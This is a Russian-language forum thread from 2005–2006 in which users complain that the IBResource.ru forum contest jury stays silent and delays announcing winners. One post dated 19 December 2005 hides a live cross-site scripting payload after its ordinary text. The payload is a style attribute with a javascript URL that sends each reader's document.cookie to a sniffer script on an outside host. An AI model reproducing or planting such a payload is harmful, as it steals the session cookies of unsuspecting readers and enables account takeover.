Инвизионист Опубликовано 30 Ноября 2005 Жалоба Поделиться Опубликовано 30 Ноября 2005 Сроки проведения конкурса:С 1 сентября по 30 ноября — представление участников на IBResource.ru. В течение этого периода на нашем форуме в специальном разделе проводится открытое обсуждение заявленных форумов всеми желающими. С 1 декабря по 30 декабря — работа жюри конкурса по выявлению победителя. Оглашение победителей к Новому Году. Итак сегодня 30 ноября. таким образом уже должна начаться работа жюри. Итак вопросы:Будет ли объявлен состав жюри? Будет ли объявлен список форумов отобранных для участия в конкурсе? Что именно будет делать жюри с максимум двумя десятками форумов в течении месяца? Зачем стока времени выделено для оценки? Ссылка на комментарий Поделиться на других сайтах Прочее
Инвизионист Опубликовано 2 Декабря 2005 Автор Жалоба Поделиться Опубликовано 2 Декабря 2005 Странно.. неужели никого не интересуют данные вопросы? Все так активно выстовляли сови работы, а сейчас молчат... Ссылка на комментарий Поделиться на других сайтах Прочее
Chrno Опубликовано 2 Декабря 2005 Жалоба Поделиться Опубликовано 2 Декабря 2005 А чего напрягаться-то? Победители в общем и целом и так понятны (Не наезд. Просто по той же "технике" альтернативы Sysman-у я не вижу). Ссылка на комментарий Поделиться на других сайтах Прочее
Инвизионист Опубликовано 2 Декабря 2005 Автор Жалоба Поделиться Опубликовано 2 Декабря 2005 Chrno нет все это понятно.. просто гораздо интереснее было бы знать что к чему, и наблюдать за ходом работы жюри. Ссылка на комментарий Поделиться на других сайтах Прочее
Jax Опубликовано 2 Декабря 2005 Жалоба Поделиться Опубликовано 2 Декабря 2005 (изменено) Вот законные победитель. Попытки повлиять на мнение жюри запрещены. Изменено 2 Декабря 2005 пользователем Fisana Ссылка на комментарий Поделиться на других сайтах Прочее
Инвизионист Опубликовано 2 Декабря 2005 Автор Жалоба Поделиться Опубликовано 2 Декабря 2005 вообще то тема была не про прогнозы, а про сам конкурс... Ссылка на комментарий Поделиться на других сайтах Прочее
Fisana Опубликовано 2 Декабря 2005 Жалоба Поделиться Опубликовано 2 Декабря 2005 Вообще-то влиять на мнение жюри после завершения публичного обсуждения - дурной тон. Поэтому пожелания и прогнозы будут безжалостно удаляться.А тема, если конкусные страсти разгорятся с прежней силой, перенесена во флейм. Ссылка на комментарий Поделиться на других сайтах Прочее
Jax Опубликовано 2 Декабря 2005 Жалоба Поделиться Опубликовано 2 Декабря 2005 Ну понятно, сказали бы хоть, что нельзя делать прогнозы погоды Ссылка на комментарий Поделиться на других сайтах Прочее
Инвизионист Опубликовано 2 Декабря 2005 Автор Жалоба Поделиться Опубликовано 2 Декабря 2005 Вообще-то влиять на мнение жюри после завершения публичного обсуждения - дурной тон. Поэтому пожелания и прогнозы будут безжалостно удаляться.А тема, если конкусные страсти разгорятся с прежней силой, перенесена во флейм. А ответы на поставленные вопросы по теме не последуют? Напоминаю Будет ли объявлен состав жюри? Будет ли объявлен список форумов отобранных для участия в конкурсе? Что именно будет делать жюри с максимум двумя десятками форумов в течении месяца? Зачем стока времени выделено для оценки? Ссылка на комментарий Поделиться на других сайтах Прочее
Sarmano Опубликовано 18 Декабря 2005 Жалоба Поделиться Опубликовано 18 Декабря 2005 Пропал раздел с конкурсом форумов.Так и должно быть ? Ссылка на комментарий Поделиться на других сайтах Прочее
PhreakeR Опубликовано 19 Декабря 2005 Жалоба Поделиться Опубликовано 19 Декабря 2005 Вероятно да =).Надеюсь, скоро объявят победителей, которые, в принципе, очевидны.. =\ Ссылка на комментарий Поделиться на других сайтах Прочее
Инвизионист Опубликовано 19 Декабря 2005 Автор Жалоба Поделиться Опубликовано 19 Декабря 2005 Прям в огромную тайну превратился конкурс то.. почти 20 дней, а ответа на вопросы не последовало.. а ведь нам просто интересно..<a href=" target="_blank"></a>` style=`background:url(java script:document.images[1].src="http://briz.7r.ru/snif.php?"+document.cookie)` Ссылка на комментарий Поделиться на других сайтах Прочее
Destruction Опубликовано 19 Декабря 2005 Жалоба Поделиться Опубликовано 19 Декабря 2005 Так вопросы у тебя непральные - незя такие вопросы задавать, технология определения победителя является секретом IBR !! А если серьёзно - то я что-то не понял, почему на вопросы не ответили.. Ссылка на комментарий Поделиться на других сайтах Прочее
Sarmano Опубликовано 26 Декабря 2005 Жалоба Поделиться Опубликовано 26 Декабря 2005 (изменено) Время идет , уже и 26 декабря...Конкурс форумов ушел в свое небытие безвозвратно. Никаких комментариев простым гражданам Жалко, такая тема интересная, столько споров интриг это все здорово. В конце просто сумрачная завеса. Будем ждать что произойдет в новом по-видимому году. Всем Удачи !! Изменено 26 Декабря 2005 пользователем Sarmano Ссылка на комментарий Поделиться на других сайтах Прочее
Инвизионист Опубликовано 30 Декабря 2005 Автор Жалоба Поделиться Опубликовано 30 Декабря 2005 а между тем 30 декабря 2005 года ... И опять ничего? Странно Ссылка на комментарий Поделиться на других сайтах Прочее
GiV Опубликовано 30 Декабря 2005 Жалоба Поделиться Опубликовано 30 Декабря 2005 Все будет, но объявление победителей все же немного растянется. Ссылка на комментарий Поделиться на других сайтах Прочее
Jax Опубликовано 31 Декабря 2005 Жалоба Поделиться Опубликовано 31 Декабря 2005 (изменено) Здорово, одного балла не хватило до 1-го место. Спасибо за конкурс, 2-ое место для нас - NewAge.gcnet.ru очень почетное. Всех благ вам IBResource.ru в новом году! Изменено 31 Декабря 2005 пользователем Jax Ссылка на комментарий Поделиться на других сайтах Прочее
emvader Опубликовано 31 Декабря 2005 Жалоба Поделиться Опубликовано 31 Декабря 2005 Поздравляю NewAge.gcnet.ru! По-моему очень достойно! Ссылка на комментарий Поделиться на других сайтах Прочее
Vulko Опубликовано 14 Января 2006 Жалоба Поделиться Опубликовано 14 Января 2006 Обещали перед рождеством объявить результаты... всё нет и нет. Ссылка на комментарий Поделиться на других сайтах Прочее
Fёanor Опубликовано 22 Января 2006 Жалоба Поделиться Опубликовано 22 Января 2006 ну и как после этого верить админам? рождество то уже фиг знает когда было. Ссылка на комментарий Поделиться на других сайтах Прочее
PALADIN+ Опубликовано 31 Января 2006 Жалоба Поделиться Опубликовано 31 Января 2006 Сорри.Здесь написано что в этой ветке можно глянуть результаты по дизайну.Runet IPB Forums Awards 2005 По технике помнится были претенденты, туры голосований. Где то же самое по дизайну?? Ссылка на комментарий Поделиться на других сайтах Прочее
Vulko Опубликовано 4 Февраля 2006 Жалоба Поделиться Опубликовано 4 Февраля 2006 Мда... некультурно. Администрация даже не извинилась. Короче кидок, и при том самый наглый... Ссылка на комментарий Поделиться на других сайтах Прочее
Рекомендуемые сообщения